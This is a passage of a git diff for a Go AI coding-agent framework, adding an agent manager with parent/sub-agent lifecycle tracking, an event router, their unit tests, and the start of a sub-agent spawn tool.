+		sb = sandbox.NewNoneSandbox()
+	}
+	registry := tools.NewRegistryWithConfig(tools.RegistryConfig{
+		WorkDir:    cfg.WorkDir,
+		Sandbox:    sb,
+		ToolFilter: cfg.Tools,
+	})
+
+	agentCfg := Config{
+		Provider:           internalProvider,
+		Model:              model,
+		Mode:               cfg.Mode,
+		ThinkingLevel:      provider.ThinkingLevel(cfg.ThinkingLevel),
+		MaxTokens:          cfg.MaxTokens,
+		SandboxMgr:         sandboxMgr,
+		Session:            sess,
+		ExtraContext:        cfg.SystemPromptExtra,
+		CompactionSettings: compactionSettings,
+		ApprovalHandler:    cfg.ApprovalHandler,
+		MultiAgent:         cfg.MultiAgent,
+	}
+
+	loopCfg := AgentLoopConfig{
+		Config:            agentCfg,
+		ToolExecutionMode: cfg.ToolExecutionMode,
+		MaxIterations:     cfg.MaxIterations,
+	}
+
+	a := NewWithLoopConfig(loopCfg, registry)
+	return NewAgentAdapter(a), nil
+}
diff --git a/internal/agent/manager.go b/internal/agent/manager.go
new file mode 100644
index 0000000..93aea27
--- /dev/null
+++ b/internal/agent/manager.go
@@ -0,0 +1,372 @@
+package agent
+
+import (
+	"context"
+	"fmt"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+)
+
+// ManagedAgentStatus captures scheduling state for an agent managed by AgentManager.
+type ManagedAgentStatus struct {
+	ID        agentpkg.AgentID
+	ParentID  agentpkg.AgentID
+	State     string
+	Result    string
+	Error     string
+	StartedAt time.Time
+	UpdatedAt time.Time
+}
+
+// AgentManager manages the lifecycle of all agent instances.
+type AgentManager struct {
+	mu       sync.RWMutex
+	agents   map[agentpkg.AgentID]agentpkg.Agent
+	parentOf map[agentpkg.AgentID]agentpkg.AgentID
+	children map[agentpkg.AgentID][]agentpkg.AgentID
+	statuses map[agentpkg.AgentID]ManagedAgentStatus
+	cancels  map[agentpkg.AgentID]context.CancelFunc
+	factory  *AgentFactory
+	counter  int64
+}
+
+// NewAgentManager creates a new agent manager.
+func NewAgentManager(factory *AgentFactory) *AgentManager {
+	return &AgentManager{
+		agents:   make(map[agentpkg.AgentID]agentpkg.Agent),
+		parentOf: make(map[agentpkg.AgentID]agentpkg.AgentID),
+		children: make(map[agentpkg.AgentID][]agentpkg.AgentID),
+		statuses: make(map[agentpkg.AgentID]ManagedAgentStatus),
+		cancels:  make(map[agentpkg.AgentID]context.CancelFunc),
+		factory:  factory,
+	}
+}
+
+// Register adds an already-created top-level agent to the manager.
+func (m *AgentManager) Register(a agentpkg.Agent) {
+	if a == nil {
+		return
+	}
+	m.mu.Lock()
+	defer m.mu.Unlock()
+
+	id := a.ID()
+	m.agents[id] = a
+	if a.ParentID() != "" {
+		m.parentOf[id] = a.ParentID()
+		m.children[a.ParentID()] = appendUniqueAgentID(m.children[a.ParentID()], id)
+	}
+	now := time.Now()
+	m.statuses[id] = ManagedAgentStatus{
+		ID:        id,
+		ParentID:  a.ParentID(),
+		State:     "ready",
+		StartedAt: now,
+		UpdatedAt: now,
+	}
+}
+
+// Create creates a new agent and registers it.
+// If opts.ParentID is set, validates the parent exists and is a top-level agent.
+func (m *AgentManager) Create(opts AgentOptions) (agentpkg.Agent, error) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+
+	// Generate ID if not provided
+	if opts.ID == "" {
+		opts.ID = agentpkg.AgentID(fmt.Sprintf("agent-%d", atomic.AddInt64(&m.counter, 1)))
+	}
+	if opts.Mode == "" {
+		opts.Mode = "agent"
+	}
+
+	// Validate parent
+	if opts.ParentID != "" {
+		parent, ok := m.agents[opts.ParentID]
+		if !ok {
+			return nil, fmt.Errorf("parent agent %s not found", opts.ParentID)
+		}
+		// Decision 5: sub-agents cannot nest (only top-level agents can spawn)
+		if parent.ParentID() != "" {
+			return nil, fmt.Errorf("parent agent %s is itself a sub-agent; nesting is not allowed", opts.ParentID)
+		}
+		policy := DefaultSubAgentPolicy()
+		if err := policy.Validate(string(opts.ParentID), opts.Mode, len(m.children[opts.ParentID])); err != nil {
+			return nil, err
+		}
+	}
+
+	a := m.factory.Create(opts)
+	m.agents[opts.ID] = a
+	if opts.ParentID != "" {
+		m.parentOf[opts.ID] = opts.ParentID
+		m.children[opts.ParentID] = append(m.children[opts.ParentID], opts.ID)
+	}
+	now := time.Now()
+	m.statuses[opts.ID] = ManagedAgentStatus{
+		ID:        opts.ID,
+		ParentID:  opts.ParentID,
+		State:     "ready",
+		StartedAt: now,
+		UpdatedAt: now,
+	}
+
+	return a, nil
+}
+
+// SetCancel records the active run cancel function for an agent.
+func (m *AgentManager) SetCancel(id agentpkg.AgentID, cancel context.CancelFunc) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	if cancel == nil {
+		delete(m.cancels, id)
+		return
+	}
+	m.cancels[id] = cancel
+}
+
+// Get returns an agent by ID.
+func (m *AgentManager) Get(id agentpkg.AgentID) (agentpkg.Agent, bool) {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	a, ok := m.agents[id]
+	return a, ok
+}
+
+// Destroy stops and removes an agent and all its children.
+func (m *AgentManager) Destroy(id agentpkg.AgentID) error {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+
+	a, ok := m.agents[id]
+	if !ok {
+		return fmt.Errorf("agent %s not found", id)
+	}
+
+	// Recursively destroy children first
+	children := m.children[id]
+	for _, childID := range children {
+		m.destroyLocked(childID)
+	}
+
+	// Abort the agent
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
+	a.Abort()
+
+	// Remove from parent's children list
+	if parentID, hasParent := m.parentOf[id]; hasParent {
+		siblings := m.children[parentID]
+		filtered := make([]agentpkg.AgentID, 0, len(siblings))
+		for _, sid := range siblings {
+			if sid != id {
+				filtered = append(filtered, sid)
+			}
+		}
+		m.children[parentID] = filtered
+	}
+
+	// Remove self
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
+	delete(m.statuses, id)
+	delete(m.cancels, id)
+
+	return nil
+}
+
+// Finish unregisters a completed top-level agent and cancels any remaining children.
+// Child statuses are retained so callers can inspect why a delegated task stopped.
+func (m *AgentManager) Finish(id agentpkg.AgentID, cause error) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+
+	for _, childID := range m.children[id] {
+		m.finishChildLocked(childID, cause)
+	}
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
+	if a, ok := m.agents[id]; ok {
+		a.Abort()
+	}
+	if parentID, hasParent := m.parentOf[id]; hasParent {
+		m.children[parentID] = removeAgentID(m.children[parentID], id)
+	}
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
+	delete(m.statuses, id)
+}
+
+// destroyLocked destroys an agent without locking (caller must hold lock).
+func (m *AgentManager) destroyLocked(id agentpkg.AgentID) {
+	// Destroy children recursively
+	for _, childID := range m.children[id] {
+		m.destroyLocked(childID)
+	}
+	if a, ok := m.agents[id]; ok {
+		if cancel, ok := m.cancels[id]; ok {
+			cancel()
+			delete(m.cancels, id)
+		}
+		a.Abort()
+	}
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
+	delete(m.statuses, id)
+	delete(m.cancels, id)
+}
+
+func (m *AgentManager) finishChildLocked(id agentpkg.AgentID, cause error) {
+	for _, childID := range m.children[id] {
+		m.finishChildLocked(childID, cause)
+	}
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
+	if a, ok := m.agents[id]; ok {
+		a.Abort()
+	}
+	st := m.statuses[id]
+	st.ID = id
+	if st.StartedAt.IsZero() {
+		st.StartedAt = time.Now()
+	}
+	if parentID, ok := m.parentOf[id]; ok {
+		st.ParentID = parentID
+	}
+	if st.State != "done" {
+		st.State = "error"
+		if cause != nil {
+			st.Error = cause.Error()
+		} else if st.Error == "" {
+			st.Error = "parent agent finished"
+		}
+	}
+	st.UpdatedAt = time.Now()
+	m.statuses[id] = st
+
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
+}
+
+// MarkRunning records that an agent has started processing a task.
+func (m *AgentManager) MarkRunning(id agentpkg.AgentID) {
+	m.updateStatus(id, "running", "", "")
+}
+
+// MarkDone records successful completion and the last reported result.
+func (m *AgentManager) MarkDone(id agentpkg.AgentID, result string) {
+	m.updateStatus(id, "done", result, "")
+}
+
+// MarkError records an agent failure.
+func (m *AgentManager) MarkError(id agentpkg.AgentID, err error) {
+	msg := ""
+	if err != nil {
+		msg = err.Error()
+	}
+	m.updateStatus(id, "error", "", msg)
+}
+
+func (m *AgentManager) updateStatus(id agentpkg.AgentID, state, result, errMsg string) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	st := m.statuses[id]
+	st.ID = id
+	if st.StartedAt.IsZero() {
+		st.StartedAt = time.Now()
+	}
+	if parentID, ok := m.parentOf[id]; ok {
+		st.ParentID = parentID
+	}
+	st.State = state
+	if result != "" {
+		st.Result = result
+	}
+	if errMsg != "" {
+		st.Error = errMsg
+	}
+	st.UpdatedAt = time.Now()
+	m.statuses[id] = st
+}
+
+// Status returns a copy of the tracked status for an agent.
+func (m *AgentManager) Status(id agentpkg.AgentID) (ManagedAgentStatus, bool) {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	st, ok := m.statuses[id]
+	return st, ok
+}
+
+// List returns all agent IDs.
+func (m *AgentManager) List() []agentpkg.AgentID {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	ids := make([]agentpkg.AgentID, 0, len(m.agents))
+	for id := range m.agents {
+		ids = append(ids, id)
+	}
+	return ids
+}
+
+func appendUniqueAgentID(ids []agentpkg.AgentID, id agentpkg.AgentID) []agentpkg.AgentID {
+	for _, existing := range ids {
+		if existing == id {
+			return ids
+		}
+	}
+	return append(ids, id)
+}
+
+func removeAgentID(ids []agentpkg.AgentID, id agentpkg.AgentID) []agentpkg.AgentID {
+	if len(ids) == 0 {
+		return nil
+	}
+	filtered := make([]agentpkg.AgentID, 0, len(ids))
+	for _, existing := range ids {
+		if existing != id {
+			filtered = append(filtered, existing)
+		}
+	}
+	return filtered
+}
+
+// Children returns the children of an agent.
+func (m *AgentManager) Children(id agentpkg.AgentID) []agentpkg.AgentID {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	children := m.children[id]
+	if children == nil {
+		return nil
+	}
+	result := make([]agentpkg.AgentID, len(children))
+	copy(result, children)
+	return result
+}
+
+// Parent returns the parent ID of an agent.
+func (m *AgentManager) Parent(id agentpkg.AgentID) (agentpkg.AgentID, bool) {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	pid, ok := m.parentOf[id]
+	return pid, ok
+}
+
+// Count returns the number of active agents.
+func (m *AgentManager) Count() int {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	return len(m.agents)
+}
diff --git a/internal/agent/manager_test.go b/internal/agent/manager_test.go
new file mode 100644
index 0000000..693e0c3
--- /dev/null
+++ b/internal/agent/manager_test.go
@@ -0,0 +1,454 @@
+package agent
+
+import (
+	"context"
+	"errors"
+	"sync"
+	"testing"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+)
+
+// --- AgentManager tests ---
+
+func newTestManager() *AgentManager {
+	factory := &AgentFactory{}
+	return NewAgentManager(factory)
+}
+
+func TestAgentManagerCreate(t *testing.T) {
+	m := newTestManager()
+
+	a, err := m.Create(AgentOptions{ID: "main"})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if a == nil {
+		t.Fatal("expected non-nil agent")
+	}
+	if a.ID() != "main" {
+		t.Errorf("expected ID 'main', got %q", a.ID())
+	}
+}
+
+func TestAgentManagerCreateAutoID(t *testing.T) {
+	m := newTestManager()
+
+	a, err := m.Create(AgentOptions{})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if a.ID() == "" {
+		t.Error("expected non-empty auto-generated ID")
+	}
+}
+
+func TestAgentManagerCreateWithParent(t *testing.T) {
+	m := newTestManager()
+
+	parent, _ := m.Create(AgentOptions{ID: "main"})
+	child, err := m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if child.ParentID() != "main" {
+		t.Errorf("expected parent 'main', got %q", child.ParentID())
+	}
+
+	children := m.Children("main")
+	if len(children) != 1 || children[0] != "sub-1" {
+		t.Errorf("expected [sub-1], got %v", children)
+	}
+
+	pid, ok := m.Parent("sub-1")
+	if !ok || pid != "main" {
+		t.Errorf("expected parent 'main', got %q (ok=%v)", pid, ok)
+	}
+
+	_ = parent
+}
+
+func TestAgentManagerCreateNestedSubAgentRejected(t *testing.T) {
+	m := newTestManager()
+
+	// Create a sub-agent
+	m.Create(AgentOptions{ID: "main"})
+	m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+
+	// Try to create a sub-sub-agent (should fail - Decision 5)
+	_, err := m.Create(AgentOptions{ID: "sub-sub-1", ParentID: "sub-1"})
+	if err == nil {
+		t.Fatal("expected error for nested sub-agent, got nil")
+	}
+}
+
+func TestAgentManagerCreateMissingParent(t *testing.T) {
+	m := newTestManager()
+
+	_, err := m.Create(AgentOptions{ID: "orphan", ParentID: "nonexistent"})
+	if err == nil {
+		t.Fatal("expected error for missing parent, got nil")
+	}
+}
+
+func TestAgentManagerGet(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+
+	a, ok := m.Get("main")
+	if !ok || a == nil {
+		t.Fatal("expected to find agent 'main'")
+	}
+
+	_, ok = m.Get("nonexistent")
+	if ok {
+		t.Error("expected not to find agent 'nonexistent'")
+	}
+}
+
+func TestAgentManagerDestroy(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+	m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	m.Create(AgentOptions{ID: "sub-2", ParentID: "main"})
+
+	if m.Count() != 3 {
+		t.Errorf("expected 3 agents, got %d", m.Count())
+	}
+
+	err := m.Destroy("main")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// All should be destroyed (children recursively)
+	if m.Count() != 0 {
+		t.Errorf("expected 0 agents after destroy, got %d", m.Count())
+	}
+}
+
+func TestAgentManagerDestroyChild(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+	m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	m.Create(AgentOptions{ID: "sub-2", ParentID: "main"})
+
+	err := m.Destroy("sub-1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Parent should still exist with one child
+	if m.Count() != 2 {
+		t.Errorf("expected 2 agents, got %d", m.Count())
+	}
+	children := m.Children("main")
+	if len(children) != 1 || children[0] != "sub-2" {
+		t.Errorf("expected [sub-2], got %v", children)
+	}
+}
+
+func TestAgentManagerFinishCancelsChildrenAndRetainsStatus(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+	m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	m.MarkRunning("sub-1")
+
+	cancelled := false
+	m.SetCancel("sub-1", func() {
+		cancelled = true
+	})
+	m.Finish("main", errors.New("network error"))
+
+	if !cancelled {
+		t.Fatal("expected child cancel func to be called")
+	}
+	if m.Count() != 0 {
+		t.Fatalf("expected no active agents, got %d", m.Count())
+	}
+	if _, ok := m.Status("main"); ok {
+		t.Fatal("expected finished parent status to be removed")
+	}
+	st, ok := m.Status("sub-1")
+	if !ok {
+		t.Fatal("expected child status to be retained")
+	}
+	if st.State != "error" {
+		t.Fatalf("expected child state error, got %q", st.State)
+	}
+	if st.Error != "network error" {
+		t.Fatalf("expected child error to preserve cause, got %q", st.Error)
+	}
+}
+
+func TestAgentManagerDestroyNotFound(t *testing.T) {
+	m := newTestManager()
+	err := m.Destroy("nonexistent")
+	if err == nil {
+		t.Fatal("expected error for destroying nonexistent agent")
+	}
+}
+
+func TestAgentManagerList(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "a"})
+	m.Create(AgentOptions{ID: "b"})
+	m.Create(AgentOptions{ID: "c"})
+
+	ids := m.List()
+	if len(ids) != 3 {
+		t.Errorf("expected 3 IDs, got %d", len(ids))
+	}
+}
+
+func TestAgentManagerChildrenEmpty(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+
+	children := m.Children("main")
+	if children != nil {
+		t.Errorf("expected nil children, got %v", children)
+	}
+}
+
+func TestAgentManagerParentNotFound(t *testing.T) {
+	m := newTestManager()
+	_, ok := m.Parent("nonexistent")
+	if ok {
+		t.Error("expected false for nonexistent agent")
+	}
+}
+
+func TestAgentManagerConcurrent(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+
+	var wg sync.WaitGroup
+	for i := 0; i < 100; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			m.Create(AgentOptions{ID: agentpkg.AgentID("sub"), ParentID: "main"})
+		}()
+	}
+	wg.Wait()
+
+	// Some will fail due to duplicate IDs, but no panic
+	if m.Count() < 2 {
+		t.Errorf("expected at least 2 agents, got %d", m.Count())
+	}
+}
+
+// --- EventRouter tests ---
+
+func TestEventRouterDispatch(t *testing.T) {
+	r := NewEventRouter()
+
+	var received []agentpkg.Event
+	r.RegisterAgent("agent-1", RouterEventHandlerFunc(func(e agentpkg.Event) error {
+		received = append(received, e)
+		return nil
+	}))
+
+	r.Dispatch(agentpkg.Event{AgentID: "agent-1", Type: agentpkg.EventTextDelta, TextDelta: "hello"})
+	r.Dispatch(agentpkg.Event{AgentID: "agent-2", Type: agentpkg.EventTextDelta, TextDelta: "world"})
+
+	if len(received) != 1 {
+		t.Fatalf("expected 1 event, got %d", len(received))
+	}
+	if received[0].TextDelta != "hello" {
+		t.Errorf("expected 'hello', got %q", received[0].TextDelta)
+	}
+}
+
+func TestEventRouterGlobal(t *testing.T) {
+	r := NewEventRouter()
+
+	var received []agentpkg.Event
+	r.RegisterGlobal(RouterEventHandlerFunc(func(e agentpkg.Event) error {
+		received = append(received, e)
+		return nil
+	}))
+
+	r.Dispatch(agentpkg.Event{AgentID: "a1", Type: agentpkg.EventDone})
+	r.Dispatch(agentpkg.Event{AgentID: "a2", Type: agentpkg.EventDone})
+
+	if len(received) != 2 {
+		t.Fatalf("expected 2 events, got %d", len(received))
+	}
+}
+
+func TestEventRouterUnregisterAgent(t *testing.T) {
+	r := NewEventRouter()
+
+	count := 0
+	r.RegisterAgent("a1", RouterEventHandlerFunc(func(e agentpkg.Event) error {
+		count++
+		return nil
+	}))
+
+	r.Dispatch(agentpkg.Event{AgentID: "a1"})
+	if count != 1 {
+		t.Fatalf("expected 1, got %d", count)
+	}
+
+	r.UnregisterAgent("a1")
+	r.Dispatch(agentpkg.Event{AgentID: "a1"})
+	if count != 1 {
+		t.Errorf("expected still 1 after unregister, got %d", count)
+	}
+}
+
+func TestEventRouterError(t *testing.T) {
+	r := NewEventRouter()
+	testErr := errors.New("test error")
+
+	r.RegisterAgent("a1", RouterEventHandlerFunc(func(e agentpkg.Event) error {
+		return testErr
+	}))
+
+	err := r.Dispatch(agentpkg.Event{AgentID: "a1"})
+	if err != testErr {
+		t.Errorf("expected test error, got %v", err)
+	}
+}
+
+func TestEventRouterHandlerCount(t *testing.T) {
+	r := NewEventRouter()
+	r.RegisterAgent("a1", RouterEventHandlerFunc(func(e agentpkg.Event) error { return nil }))
+	r.RegisterAgent("a1", RouterEventHandlerFunc(func(e agentpkg.Event) error { return nil }))
+	r.RegisterGlobal(RouterEventHandlerFunc(func(e agentpkg.Event) error { return nil }))
+
+	if r.HandlerCount("a1") != 2 {
+		t.Errorf("expected 2 handlers for a1, got %d", r.HandlerCount("a1"))
+	}
+	if r.HandlerCount("a2") != 0 {
+		t.Errorf("expected 0 handlers for a2, got %d", r.HandlerCount("a2"))
+	}
+	if r.GlobalHandlerCount() != 1 {
+		t.Errorf("expected 1 global handler, got %d", r.GlobalHandlerCount())
+	}
+}
+
+func TestEventRouterMultipleAgents(t *testing.T) {
+	r := NewEventRouter()
+
+	var mu sync.Mutex
+	received := map[agentpkg.AgentID][]string{}
+
+	r.RegisterGlobal(RouterEventHandlerFunc(func(e agentpkg.Event) error {
+		mu.Lock()
+		received[e.AgentID] = append(received[e.AgentID], e.TextDelta)
+		mu.Unlock()
+		return nil
+	}))
+
+	r.Dispatch(agentpkg.Event{AgentID: "a1", TextDelta: "from-a1"})
+	r.Dispatch(agentpkg.Event{AgentID: "a2", TextDelta: "from-a2"})
+	r.Dispatch(agentpkg.Event{AgentID: "a1", TextDelta: "from-a1-again"})
+
+	if len(received["a1"]) != 2 {
+		t.Errorf("expected 2 events for a1, got %d", len(received["a1"]))
+	}
+	if len(received["a2"]) != 1 {
+		t.Errorf("expected 1 event for a2, got %d", len(received["a2"]))
+	}
+}
+
+// --- AgentAdapter tests ---
+
+func TestAgentAdapterImplementsInterface(t *testing.T) {
+	// Verify AgentAdapter satisfies agent.Agent interface at compile time
+	var _ agentpkg.Agent = (*AgentAdapter)(nil)
+}
+
+func TestEventToPublic(t *testing.T) {
+	e := Event{
+		AgentID:        "test-agent",
+		Type:           EventTextDelta,
+		TextDelta:      "hello",
+		ToolCallID:     "tc1",
+		ToolName:       "bash",
+		ToolArgs:       map[string]any{"cmd": "ls"},
+		StatusMessage:  "running",
+		Done:           true,
+		StopReason:     "end_turn",
+		Error:          context.Canceled,
+		ApprovalID:     "ap1",
+		ApprovalTool:   "write",
+		ApprovalResult: true,
+	}
+
+	pub := EventToPublic(e)
+	if pub.AgentID != "test-agent" {
+		t.Errorf("expected agent ID 'test-agent', got %q", pub.AgentID)
+	}
+	if pub.Type != agentpkg.EventTextDelta {
+		t.Errorf("expected EventTextDelta, got %d", pub.Type)
+	}
+	if pub.TextDelta != "hello" {
+		t.Errorf("expected 'hello', got %q", pub.TextDelta)
+	}
+	if pub.Error != context.Canceled {
+		t.Errorf("expected context.Canceled, got %v", pub.Error)
+	}
+	if !pub.ApprovalResult {
+		t.Error("expected ApprovalResult=true")
+	}
+}
+
+func TestMessageRoundTrip(t *testing.T) {
+	original := agentpkg.Message{
+		Role:    agentpkg.RoleAssistant,
+		Content: "test content",
+		Contents: []agentpkg.ContentBlock{
+			{Type: "text", Text: "hello"},
+			{Type: "toolCall", ToolCall: &agentpkg.ToolCallBlock{ID: "tc1", Name: "bash"}},
+		},
+		Usage: &agentpkg.Usage{InputTokens: 100, OutputTokens: 50},
+	}
+
+	internal := MessageFromPublic(original)
+	back := MessageToPublic(internal)
+
+	if back.Role != original.Role {
+		t.Errorf("role mismatch: %q vs %q", back.Role, original.Role)
+	}
+	if back.Content != original.Content {
+		t.Errorf("content mismatch: %q vs %q", back.Content, original.Content)
+	}
+	if len(back.Contents) != 2 {
+		t.Fatalf("expected 2 contents, got %d", len(back.Contents))
+	}
+	if back.Contents[1].ToolCall.Name != "bash" {
+		t.Errorf("tool call name mismatch: %q", back.Contents[1].ToolCall.Name)
+	}
+	if back.Usage.InputTokens != 100 {
+		t.Errorf("usage mismatch: %d", back.Usage.InputTokens)
+	}
+}
+
+func TestContextUsageToPublicNil(t *testing.T) {
+	if ContextUsageToPublic(nil) != nil {
+		t.Error("expected nil for nil input")
+	}
+}
+
+func TestWrapEventChan(t *testing.T) {
+	in := make(chan Event, 2)
+	in <- Event{AgentID: "a1", Type: EventTextDelta, TextDelta: "hi"}
+	in <- Event{AgentID: "a1", Type: EventDone}
+	close(in)
+
+	out := WrapEventChan(in)
+	var events []agentpkg.Event
+	for e := range out {
+		events = append(events, e)
+	}
+	if len(events) != 2 {
+		t.Fatalf("expected 2 events, got %d", len(events))
+	}
+	if events[0].TextDelta != "hi" {
+		t.Errorf("expected 'hi', got %q", events[0].TextDelta)
+	}
+}
diff --git a/internal/agent/router.go b/internal/agent/router.go
new file mode 100644
index 0000000..44211d7
--- /dev/null
+++ b/internal/agent/router.go
@@ -0,0 +1,92 @@
+package agent
+
+import (
+	"sync"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+)
+
+// RouterEventHandler receives agent events for routing purposes.
+type RouterEventHandler interface {
+	HandleRouterEvent(event agentpkg.Event) error
+}
+
+// RouterEventHandlerFunc adapts a function to RouterEventHandler.
+type RouterEventHandlerFunc func(event agentpkg.Event) error
+
+// HandleRouterEvent implements RouterEventHandler.
+func (f RouterEventHandlerFunc) HandleRouterEvent(event agentpkg.Event) error {
+	return f(event)
+}
+
+// EventRouter routes events from agents to consumers (UI, parent agents).
+type EventRouter struct {
+	mu       sync.RWMutex
+	handlers map[agentpkg.AgentID][]RouterEventHandler
+	global   []RouterEventHandler
+}
+
+// NewEventRouter creates a new event router.
+func NewEventRouter() *EventRouter {
+	return &EventRouter{
+		handlers: make(map[agentpkg.AgentID][]RouterEventHandler),
+	}
+}
+
+// RegisterAgent registers an event handler for a specific agent.
+func (r *EventRouter) RegisterAgent(id agentpkg.AgentID, handler RouterEventHandler) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	r.handlers[id] = append(r.handlers[id], handler)
+}
+
+// UnregisterAgent removes all handlers for a specific agent.
+func (r *EventRouter) UnregisterAgent(id agentpkg.AgentID) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	delete(r.handlers, id)
+}
+
+// RegisterGlobal registers a handler that receives events from all agents.
+func (r *EventRouter) RegisterGlobal(handler RouterEventHandler) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	r.global = append(r.global, handler)
+}
+
+// Dispatch sends an event to the appropriate handlers.
+// Returns the first error from any handler, or nil.
+func (r *EventRouter) Dispatch(event agentpkg.Event) error {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+
+	// Route to agent-specific handlers
+	for _, h := range r.handlers[event.AgentID] {
+		if err := h.HandleRouterEvent(event); err != nil {
+			return err
+		}
+	}
+
+	// Route to global handlers
+	for _, h := range r.global {
+		if err := h.HandleRouterEvent(event); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+// HandlerCount returns the number of handlers for a given agent (for testing).
+func (r *EventRouter) HandlerCount(id agentpkg.AgentID) int {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	return len(r.handlers[id])
+}
+
+// GlobalHandlerCount returns the number of global handlers (for testing).
+func (r *EventRouter) GlobalHandlerCount() int {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	return len(r.global)
+}
diff --git a/internal/agent/subagent.go b/internal/agent/subagent.go
new file mode 100644
index 0000000..6ea7593
--- /dev/null
+++ b/internal/agent/subagent.go
@@ -0,0 +1,492 @@
+package agent
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"strings"
+	"sync"
+	"time"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// SubAgentSpawnTool creates and starts a sub-agent.
+type SubAgentSpawnTool struct {
+	manager *AgentManager
+}
+
+// NewSubAgentSpawnTool creates a new subagent_spawn tool.
+func NewSubAgentSpawnTool(m *AgentManager) *SubAgentSpawnTool {
+	return &SubAgentSpawnTool{manager: m}
+}
+
+func (t *SubAgentSpawnTool) Name() string { return "subagent_spawn" }
+func (t *SubAgentSpawnTool) Description() string {
+	return "Create and start a bounded sub-agent task. Returns a handle for status/result polling."
+}
+func (t *SubAgentSpawnTool) PromptSnippet() string {
+	return "Create a bounded sub-agent task for independent work"
+}
+func (t *SubAgentSpawnTool) PromptGuidelines() []string {
+	return []string{
+		"Use subagent_spawn only for independent subtasks with clear scope, expected output, and stop conditions",
+		"Spawn multiple sub-agents in parallel for independent investigation or review work, then reconcile their results in the main agent",
+		"Use subagent_status to poll results and verify important claims before acting on them",
+		"Use subagent_destroy to clean up finished sub-agents",
+	}
+}
+
+func (t *SubAgentSpawnTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"task": {"type": "string", "description": "Focused task for the sub-agent, including scope, relevant paths/context, expected artifact, and stop conditions"},
+			"mode": {"type": "string", "enum": ["plan", "agent", "yolo"], "default": "agent", "description": "Agent mode"},
+			"work_dir": {"type": "string", "description": "Working directory for the sub-agent (defaults to current)"},
+			"tools": {"type": "array", "items": {"type": "string"}, "description": "Allowed tools (empty = all)"},
+			"max_iterations": {"type": "integer", "default": 50, "description": "Maximum iterations"},
+			"system_prompt_extra": {"type": "string", "description": "Extra context for the sub-agent"}
+		},
+		"required": ["task"]
+	}`)
+}
+
+func (t *SubAgentSpawnTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	task, _ := params["task"].(string)
+	if task == "" {
+		return tools.ToolResult{}, fmt.Errorf("task is required")
+	}
+
+	mode, _ := params["mode"].(string)
+	if mode == "" {
+		mode = "agent"
+	}
+
+	workDir, _ := params["work_dir"].(string)
+
+	maxIter := 50
+	if v, ok := params["max_iterations"].(float64); ok && v > 0 {
+		maxIter = int(v)
+	}
+
+	extra, _ := params["system_prompt_extra"].(string)
+
+	var toolFilter []string
+	if ts, ok := params["tools"].([]any); ok {
+		for _, tt := range ts {
+			if s, ok := tt.(string); ok {
+				toolFilter = append(toolFilter, s)
+			}
+		}
+	}
+
+	// Extract parent agent ID from context (injected by executeTool)
+	parentID, _ := AgentIDFromContext(ctx)
+
+	// Extract parent's event channel from context (injected by executeTool)
+	parentEventCh, _ := EventChanFromContext(ctx)
+
+	// Apply per-agent timeout from default policy, tied to the parent run context.
+	policy := DefaultSubAgentPolicy()
+	parentRunCtx, ok := ParentRunContextFromContext(ctx)
+	if !ok || parentRunCtx == nil {
+		parentRunCtx = context.Background()
+	}
